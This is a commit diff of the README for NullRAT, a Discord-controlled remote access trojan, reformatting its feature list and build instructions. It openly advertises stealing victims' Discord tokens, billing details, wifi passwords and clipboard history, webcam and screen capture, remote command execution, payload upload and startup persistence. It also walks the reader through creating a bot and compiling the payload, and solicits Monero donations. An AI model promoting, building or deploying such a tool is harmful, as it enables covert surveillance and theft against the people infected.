|
6 | 6 |
|
7 | 7 | --- |
8 | 8 |
|
9 | | -## Announcement: |
| 9 | + |
| 10 | +</br> |
| 11 | + |
| 12 | + |
| 13 | +> # Announcement: |
10 | 14 | **04/21/2022** |
11 | 15 |
|
12 | 16 | This project is undergoing a redesign. You might not see a new release in a few months. **NullRAT is not dead** |
13 | 17 |
|
14 | | -Not to worry though, [one last release](https://github.com/NullCode1337/NullRAT/releases/tag/v7.5) has been published with a new compiler, to ensure everything is alright |
| 18 | +Not to worry though, [one last release](https://github.com/NullCode1337/NullRAT/releases) has been published with a new compiler, to ensure everything is alright |
| 19 | + |
| 20 | + |
| 21 | +</br> |
15 | 22 |
|
16 | | -## Features: |
| 23 | + |
| 24 | +> # Features: |
17 | 25 | <details> |
18 | 26 | <summary>NullRAT features:</summary> |
19 | | -<h4>-> Always maintained</br></br> |
20 | | --> Designed to be very noob friendly with intuitive features:</br> |
21 | | - - Controlled via slash commands</br> |
22 | | - - Some commands supported with buttons</br> |
23 | | - - Etc!</br></br> |
24 | | --> Supports targeting multiple victims [NEW]!</br> |
25 | | --> Created with small size in mind! (7MB payload)</h4> |
| 27 | + |
| 28 | +```diff |
| 29 | ++ Always maintained |
| 30 | + |
| 31 | ++ Designed to be very noob friendly with intuitive features: |
| 32 | + +- Controlled via slash commands |
| 33 | + +- And some commands supported with buttons |
| 34 | + |
| 35 | ++ Supports targeting multiple victims [NEW]! |
| 36 | + |
| 37 | ++ Created with small size in mind! (7MB payload) |
| 38 | +``` |
| 39 | + |
26 | 40 | </details> |
27 | 41 |
|
28 | 42 | <details> |
29 | 43 | <summary>NullRAT Payload features:</summary> |
30 | | -<h4>-> Find the public IP Address of the victim</br></br> |
31 | | --> Find their Discord token(s) and all user info:</br> |
32 | | - - Username, Tag and ID</br> |
33 | | - - Email Address </br> |
34 | | - - Phone Number</br> |
35 | | - - Nitro Status </br></br> |
36 | | --> Find victim's geographic information:</br> |
37 | | - - Country</br> |
38 | | - - City</br> |
39 | | - - Region</br> |
40 | | - - Latitude & longitude</br> |
41 | | - - Zip Code</br> |
42 | | - - ISP</br></br> |
43 | | --> Take pictures using victim's webcam </br> |
44 | | --> Take screenshot of victim's monitor</br> |
45 | | --> Download files from victim's PC</br> |
46 | | --> Upload payloads to victim's PC</br> |
47 | | --> Get victim's system information</br> |
48 | | --> Execute CMD/Powershell command </br> |
49 | | --> Find any environment variables</br> |
50 | | --> See directory contents, and do other directory manipulation </br> |
51 | | --> Get victim's clipboard text history</br> |
52 | | --> Add executable to startup with one command</br> |
53 | | --> Find their billing information</br> |
54 | | --> Find their wifi names and passwords</br> |
55 | | --> Hide or unhide files in their computer</br> |
56 | | -**) ...and more!</h4> |
| 44 | + |
| 45 | +```diff |
| 46 | ++ Find the public IP Address of the victim |
| 47 | + |
| 48 | ++ Find their Discord token(s) and all user info: |
| 49 | + - Username, Tag and ID |
| 50 | + - Email Address |
| 51 | + - Phone Number |
| 52 | + - Nitro Status |
| 53 | + |
| 54 | ++ Find victim's geographic information: |
| 55 | + - Country |
| 56 | + - City |
| 57 | + - Region |
| 58 | + - Latitude & longitude |
| 59 | + - Zip Code |
| 60 | + - ISP |
| 61 | + |
| 62 | ++ Take pictures using victim's webcam |
| 63 | + |
| 64 | ++ Take screenshot of victim's monitor |
| 65 | + |
| 66 | ++ Download files from victim's PCs |
| 67 | + |
| 68 | ++ Upload payloads to victim's PC |
| 69 | + |
| 70 | ++ Get victim's system information |
| 71 | + |
| 72 | ++ Execute CMD/Powershell command |
| 73 | + |
| 74 | ++ Find any environment variables |
| 75 | + |
| 76 | ++ See directory contents, and do other directory manipulation |
| 77 | + |
| 78 | ++ Get victim's clipboard text history |
| 79 | + |
| 80 | ++ Add executable to startup with one command |
| 81 | + |
| 82 | ++ Find their billing information |
| 83 | + |
| 84 | ++ Find their wifi names and passwords |
| 85 | + |
| 86 | ++ Hide or unhide files in their computer |
| 87 | + |
| 88 | ++ ...and more! |
| 89 | +``` |
| 90 | + |
57 | 91 | </details> |
58 | 92 |
|
59 | | -## How to use: |
| 93 | + |
| 94 | +</br> |
| 95 | + |
| 96 | + |
| 97 | +> # How to use: |
60 | 98 | #### Requirements: |
61 | 99 | - **Python 3.8+** (Tick "Add to PATH" while installing) [Microsoft Store version of Python **is broken**] |
62 | 100 | - **PIP Folder added to path** (the path is `C:\Users\{username}\Appdata\Roaming\Python\{python ver (Example: Python310)}\Scripts`) |
63 | 101 |
|
64 | 102 | #### Preparation: |
65 | 103 | - Create a Discord Bot and [get it's token](https://github.com/NullCode1337/NullRAT/blob/source/Getting%20Variables.md#discord-bot-token) |
66 | 104 | - [Create a proper invite link](https://github.com/NullCode1337/NullRAT/blob/source/Getting%20Variables.md#proper-bot-invite-link) and add it to your server |
67 | | -- Read [Getting Variables.md](https://github.com/NullCode1337/NullRAT/blob/source/Getting%20Variables.md) and store all the variables in a temporary file (optional) |
| 105 | +- Optionally, store the [Notification ID](https://github.com/NullCode1337/NullRAT/blob/source/Getting%20Variables.md#channel-id) and [Server ID](https://github.com/NullCode1337/NullRAT/blob/source/Getting%20Variables.md#server-ids) along with the token for easy access |
68 | 106 |
|
69 | 107 | #### Steps: |
70 | 108 | 1. Dowload the latest release of NullRAT (git cloning/download zip will no longer work) |
71 | 109 | 2. Run the Dependencies Installer (which will install NullRAT's dependencies) |
72 | | -3. Run the Compiler, and input information according to the temporary file. NullRAT payload will be right there! |
| 110 | +3. Run the Variables generator and input the stored information as required |
| 111 | +4. Run the Compiler and provide all your options. NullRAT payload will be right there! |
73 | 112 |
|
74 | 113 | - **Video tutorial:** [https://youtu.be/G8CsgWYiwWI](https://youtu.be/G8CsgWYiwWI) |
75 | 114 | - **NullRAT Discord:** [https://discord.com/invite/s9QANySc2q](https://discord.com/invite/s9QANySc2q) |
76 | 115 |
|
77 | | -## Donate: |
| 116 | + |
| 117 | +</br> |
| 118 | + |
| 119 | + |
| 120 | +> # Donate: |
78 | 121 | <h6 align=center>( <b>Even if you can't donate, it would be great if you starred this project</b> )</br></br> |
79 | 122 | ( <b>It just gives me more motivation to work on it and improve it</b> )</h6> |
80 | 123 |
|
81 | 124 | <details> |
82 | 125 | <summary>XMR Address</summary> |
83 | | -<br> |
84 | | -<b>48ehSGucnMHFir7YYT9eDfDrXZcrRx9PEeFL52tyDRTz3ZYSbQpnzoaXW484TzvEHkDucLiGGa7nAgcVy7gZSbsuHqgL3Er</b> |
| 126 | + |
| 127 | +</br>48ehSGucnMHFir7YYT9eDfDrXZcrRx9PEeFL52tyDRTz3ZYSbQpnzoaXW484TzvEHkDucLiGGa7nAgcVy7gZSbsuHqgL3Er |
85 | 128 | </details> |
86 | 129 |
|
87 | | -## Credits: |
| 130 | + |
| 131 | +</br> |
| 132 | + |
| 133 | + |
| 134 | +> # Credits: |
88 | 135 | 1) Sp00p64 |
89 | 136 | 2) Buntii |
90 | 137 | 3) usrDottik |
|
0 commit comments